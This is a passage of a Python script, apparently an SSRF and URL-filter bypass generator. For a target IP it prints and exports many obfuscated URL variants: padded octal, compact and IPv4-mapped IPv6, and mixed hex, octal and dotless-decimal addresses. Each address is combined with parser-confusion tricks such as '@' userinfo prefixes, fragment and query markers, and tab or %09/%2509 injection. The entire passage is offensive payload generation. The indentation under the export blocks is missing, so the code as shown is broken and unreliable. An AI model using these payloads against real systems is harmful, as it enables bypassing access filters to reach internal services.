print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP6 = '0' + OCT_SINGLE(ipFrag3) + "." + '00' + OCT_SINGLE(ipFrag2) + "." + '000' + OCT_SINGLE(ipFrag1) + "." + '0000' + OCT_SINGLE(ipFrag0)
print('http://',IP6,':',PORT,'/',sep='')
print('http://',IP6,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP6,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
print('http://',IP6,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP6,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP6,':',PORT,'/',sep='')
print('http://',IP6,':',PORT,':80','/',sep='')
print('http://',IP6,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP6,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP6,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP6,':',PORT,'/',file=f,sep='')
print('http://',IP6,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP6,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
print('http://',IP6,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP6,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP6,':',PORT,'/',file=f,sep='')
print('http://',IP6,':',PORT,':80','/',file=f,sep='')
print('http://',IP6,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP6,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP6,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 7 - IPv6 compact version
print(bluecolor,"IPv6 compact version IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP7 = '[::' + ipFrag3 + "." + ipFrag2 + "." + ipFrag1 + "." + ipFrag0 + ']'
print('http://',IP7,':',PORT,'/',sep='')
print('http://',IP7,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP7,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
print('http://',IP7,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP7,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP7,':',PORT,'/',sep='')
print('http://',IP7,':',PORT,':80','/',sep='')
print('http://',IP7,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP7,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP7,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP7,':',PORT,'/',file=f,sep='')
print('http://',IP7,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP7,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
print('http://',IP7,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP7,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP7,':',PORT,'/',file=f,sep='')
print('http://',IP7,':',PORT,':80','/',file=f,sep='')
print('http://',IP7,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP7,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP7,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 8 - IPv6 mapped version
print(bluecolor,"IPv6 mapped version IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP8 = '[::ffff:' + ipFrag3 + "." + ipFrag2 + "." + ipFrag1 + "." + ipFrag0 + ']'
print('http://',IP8,':',PORT,'/',sep='')
print('http://',IP8,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP8,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
print('http://',IP8,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP8,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP8,':',PORT,'/',sep='')
print('http://',IP8,':',PORT,':80','/',sep='')
print('http://',IP8,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP8,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP8,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP8,':',PORT,'/',file=f,sep='')
print('http://',IP8,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP8,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
print('http://',IP8,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP8,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP8,':',PORT,'/',file=f,sep='')
print('http://',IP8,':',PORT,':80','/',file=f,sep='')
print('http://',IP8,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP8,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP8,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 9 - Dotted hexadecimal + Dotted octal + Dotless decimal
print(bluecolor,"Dotted hexadecimal + Dotted octal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP9 = HEX_SINGLE(ipFrag3,"yes") + "." + OCT_SINGLE(ipFrag2) + "." + str(DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
print('http://',IP9,':',PORT,'/',sep='')
print('http://',IP9,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP9,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
print('http://',IP9,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP9,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP9,':',PORT,'/',sep='')
print('http://',IP9,':',PORT,':80','/',sep='')
print('http://',IP9,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP9,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP9,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP9,':',PORT,'/',file=f,sep='')
print('http://',IP9,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP9,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
print('http://',IP9,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP9,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP9,':',PORT,'/',file=f,sep='')
print('http://',IP9,':',PORT,':80','/',file=f,sep='')
print('http://',IP9,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP9,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP9,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 10 - Dotted hexadecimal + Dotless decimal
print(bluecolor,"Dotted hexadecimal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP10 = HEX_SINGLE(ipFrag3,"yes") + "." + str(DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
print('http://',IP10,':',PORT,'/',sep='')
print('http://',IP10,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP10,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
print('http://',IP10,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP10,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP10,':',PORT,'/',sep='')
print('http://',IP10,':',PORT,':80','/',sep='')
print('http://',IP10,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP10,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP10,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP10,':',PORT,'/',file=f,sep='')
print('http://',IP10,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP10,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
print('http://',IP10,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP10,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP10,':',PORT,'/',file=f,sep='')
print('http://',IP10,':',PORT,':80','/',file=f,sep='')
print('http://',IP10,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP10,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP10,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 11 - Dotted octal with padding + Dotless decimal
print(bluecolor,"Dotted octal with padding + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP11 = '0' + OCT_SINGLE(ipFrag3) + "." + str(DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
print('http://',IP11,':',PORT,'/',sep='')
print('http://',IP11,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP11,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
print('http://',IP11,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP11,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP11,':',PORT,'/',sep='')
print('http://',IP11,':',PORT,':80','/',sep='')
print('http://',IP11,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP11,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP11,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP11,':',PORT,'/',file=f,sep='')
print('http://',IP11,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP11,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
print('http://',IP11,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP11,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP11,':',PORT,'/',file=f,sep='')
print('http://',IP11,':',PORT,':80','/',file=f,sep='')
print('http://',IP11,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP11,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP11,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 12 - Dotted octal with padding + Dotted hexadecimal + Dotless decimal
print(bluecolor,"Dotted octal with padding + Dotted hexadecimal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP12 = '0' + OCT_SINGLE(ipFrag3) + "." + HEX_SINGLE(ipFrag2,"yes") + "." + str(DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
print('http://',IP12,':',PORT,'/',sep='')
print('http://',IP12,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP12,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
print('http://',IP12,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP12,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP12,':',PORT,'/',sep='')
print('http://',IP12,':',PORT,':80','/',sep='')
print('http://',IP12,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP12,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP12,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
